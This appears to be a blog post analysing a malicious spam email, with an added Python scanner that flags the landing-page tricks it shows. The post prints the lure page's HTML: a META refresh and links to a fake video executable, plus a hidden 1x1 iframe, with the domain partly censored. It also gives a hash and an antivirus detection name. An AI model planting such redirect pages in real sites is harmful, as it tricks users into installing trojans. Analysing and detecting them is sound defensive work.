Hi,
Spam is usually aimed at mass marketing and contains no malicious code, but lately a second, rapidly growing trend has emerged (especially in web applications that allow comments, such as blogs): malicious spam, an apparently ordinary spam mail that redirects you to malicious code.
Here is the latest malicious spam mail that I’ve received on my gmail account:
Subject: mp3 Shocking for evilcry
Content: Rihanna New video!!!
Look It now
The malicious link points to http://ro{CENSORED}eel.com/index1.php
Dissecting the malicious link, we can see that a redirection is performed:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<META HTTP-EQUIV="refresh" CONTENT="5;URL=http://ro{CENSORED}eel.com/video3425gdf3.exe">
<title></title>
</head>
<body style="background:#ffffff;">
<iframe src="http://ro{CENSORED}l.com/pindex.php" style="width:1px; height:1px;"></iframe><br>
<div style="text-align:center; padding-top:50px;">
<a href="http://ro{CENSORED}l.com/video3425gdf3.exe" style="font-weight:bold;"><img src="wait.gif" style="border:0px;"></a><br>
<br>
<a href="http://r{CENSORED}l.com/video3425gdf3.exe" style="font-weight:bold; color:#364980; font-size:17px;">Download Video</a>
</div>
</body>
</html>
The technique is always the same: a fake Video.exe that the victim downloads and executes. In this case the malware is named video3425gdf3.exe.
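As an added example (not code from the original post), the following scanner flags the three tricks visible in the landing page above: a META refresh that points at an executable, a 1x1 iframe, and anchors whose href ends in an executable extension. The sample page is a constructed copy of the post's HTML with the domain censored as in the post; the extension list is an assumption.

```python
# Added example: flag the redirect tricks used by the spam landing page.
# Standard library only; it parses HTML text and never fetches anything.
import re
from html.parser import HTMLParser

# Assumed set of extensions worth flagging as "executable" downloads.
EXECUTABLE_EXT = (".exe", ".scr", ".pif", ".com", ".bat")

class LandingPageScanner(HTMLParser):
    """Collect (indicator, url) pairs from a landing page in document order."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            # CONTENT="5;URL=http://..." -> extract the URL part after "URL="
            m = re.search(r"url\s*=\s*(\S+)", a.get("content", ""), re.I)
            if m and m.group(1).lower().endswith(EXECUTABLE_EXT):
                self.findings.append(("meta_refresh_to_executable", m.group(1)))
        elif tag == "iframe":
            style = a.get("style", "").replace(" ", "").lower()
            if "width:1px" in style or "height:1px" in style or "display:none" in style:
                self.findings.append(("hidden_iframe", a.get("src", "")))
        elif tag == "a":
            href = a.get("href", "")
            if href.lower().endswith(EXECUTABLE_EXT):
                self.findings.append(("link_to_executable", href))

def scan_landing_page(html):
    """Return the list of indicators found in the given HTML string."""
    p = LandingPageScanner()
    p.feed(html)
    return p.findings

# Constructed sample: the landing page from the post, domain censored as in the post.
SAMPLE = """<html><head>
<META HTTP-EQUIV="refresh" CONTENT="5;URL=http://ro{CENSORED}eel.com/video3425gdf3.exe">
</head><body>
<iframe src="http://ro{CENSORED}l.com/pindex.php" style="width:1px; height:1px;"></iframe>
<a href="http://ro{CENSORED}l.com/video3425gdf3.exe">Download Video</a>
</body></html>"""

if __name__ == "__main__":
    for kind, url in scan_landing_page(SAMPLE):
        print(kind, url)
```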
Let’s analyse video3425gdf3.exe
File: video3425gdf3.exe
MD5: acd73c4930e8191fa7a35dac448d7f4b
Kaspersky Anti-Virus: Found Trojan-Downloader.Win32.Agent.aacg
Posted by evilcodecave